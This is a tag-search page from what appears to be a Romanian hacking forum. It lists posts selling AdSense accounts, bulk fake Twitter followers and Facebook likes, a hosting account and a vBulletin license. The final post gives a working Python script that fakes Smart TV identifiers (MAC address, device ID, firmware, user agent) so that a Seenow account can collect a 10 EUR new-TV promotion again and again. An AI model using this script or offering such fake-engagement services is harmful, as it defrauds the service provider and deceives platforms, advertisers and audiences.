Search the Community
Showing results for tags 'eur'.
-
Vand conturi adsense noi , le fac special pentru cine e interesat ( sunt verificate ) . 50 eur . Am nevoie de : Nume : Adresa : Oras : Judet : Tara: Cod Postal : Telefon : optional mail nou cu parola .
-
Dupa cum spune si titlul, bag 10,000 Twitter followers pentru 10 eur (btc/paypal) Plata inainte pentru userii noi sau fara rep. Livrare: 48-72h. Locatie: worldwide Pentru 5 eur aditional la pachetul de Twitter, pot baga si 5000 like-uri Facebook la status-uri, poze, video-uri (nu fan page).
-
Vand cont de gazduire pe site-ul hostclean.ro Balan?a de credit disponibil?: 28.35 EUR Si domeniul: compactpeople.com Astept oferte !
-
Oferta limitata: Vand like-uri Facebook pentru poze, postari, commenturi sau status-uri (nu pentru fan pages). Cantitate: minim 20.000 (de obicei intra mai multi) Sursa: undisclosed Pret: 65 eur (paypal invoice sau btc) Timp livrare: 7 zile lucratoare 10.000 = 35 eur (4 zile) 5.000 = 20 eur (3 zile) Pot fi recomandat de user RST caruia i-am vandut pana acum daca e nevoie (de fiecare data am livrat peste cantitatea comandata).
-
(stiai ca... RST ruleaza pe platforma vBulletin?) (stiai ca... o licenta vBulletin 4.2 in momentul de fata costa 237 eur?) De vanzare: - licenta vBulletin 4.x - are download si vBulletin 3.x - Forum Runner mobile app - pretul cu care a fost cumparata la vremea respectiva (in 2011): 210 EUR - pret vanzare: 21 eur (paypal / btc)
-
Seenow has a promotion: they give you 10 EUR for free if you connect with your account on a Smart TV which has been purchased recently. This promotion is only for one TV you have. So, there must be something TV sends in order to identify itself, something unique... To keep the long story short, here is the POC in Python v 3.3: #usage: scriptname.py email@email.com password #email is the one associated with SeeNow account #password is your SeeNow password import urllib.request, urllib.parse, urllib.error import urllib.request, urllib.error, urllib.parse import json import random import string import sys def random_char(y): return ''.join(random.choice(string.ascii_letters) for x in range(y)) def randomMAC(): mac = [ 0x00, 0x16, 0x3e, random.randint(0x00, 0x7f), random.randint(0x00, 0xff), random.randint(0x00, 0xff) ] return ''.join(map(lambda x: "%02x" % x, mac)) url = 'http://www.seenow.ro/smarttv/user/login/sessionid/f' + str(random.randint(0,9)) + str(random_char(22)) + str(random.randint(0,9)) + str(random.randint(0,9)) + str(random.randint(0,9)) url = url + '?firmware=T-INFOLINK2012-0' + str(random.randint(0,9)) + str(random.randint(10,28)) url = url + '&modelCode=12_X' + str(random.randint(10,20)) + 'PLUS' url = url + '&macAddress=' + str(randomMAC()) url = url + '&deviceUniqueId=' + random.choice(string.ascii_uppercase) + str(random.randint(0,9)) + str(random_char(6)) + str(random.randint(0,9)) + str(random_char(6)) url = url + '&deviceType=0&appId=111299000393&appVersion=2.05&language=RO&language_id=1' user_agent = 'Mozilla/5.0 (SmartHub; SMART-TV; U; Linux/SmartTV; Maple2012) AppleWebKit/534.7 (KHTML, like Gecko) SmartTV Safari/534.7' values = {'email' : sys.argv[1], 'password' : sys.argv[2], 'remember' : 'false' } headers = { 'User-Agent' : user_agent, 'Content-Type' : 'application/x-www-form-urlencoded' } data = urllib.parse.urlencode(values) binary_data = data.encode('ASCII') req = urllib.request.Request(url, binary_data, headers) response = urllib.request.urlopen(req) resp = str(response.read()) tosearch = 'success' if resp.find(tosearch) > 0: print (" [X] YOU ARE LOGGED IN! Check if you have the 10 EUR into your account") print(" [+] Response: \n" + resp) Hope you'll enjoy it. Keep it safe! Do not abuse!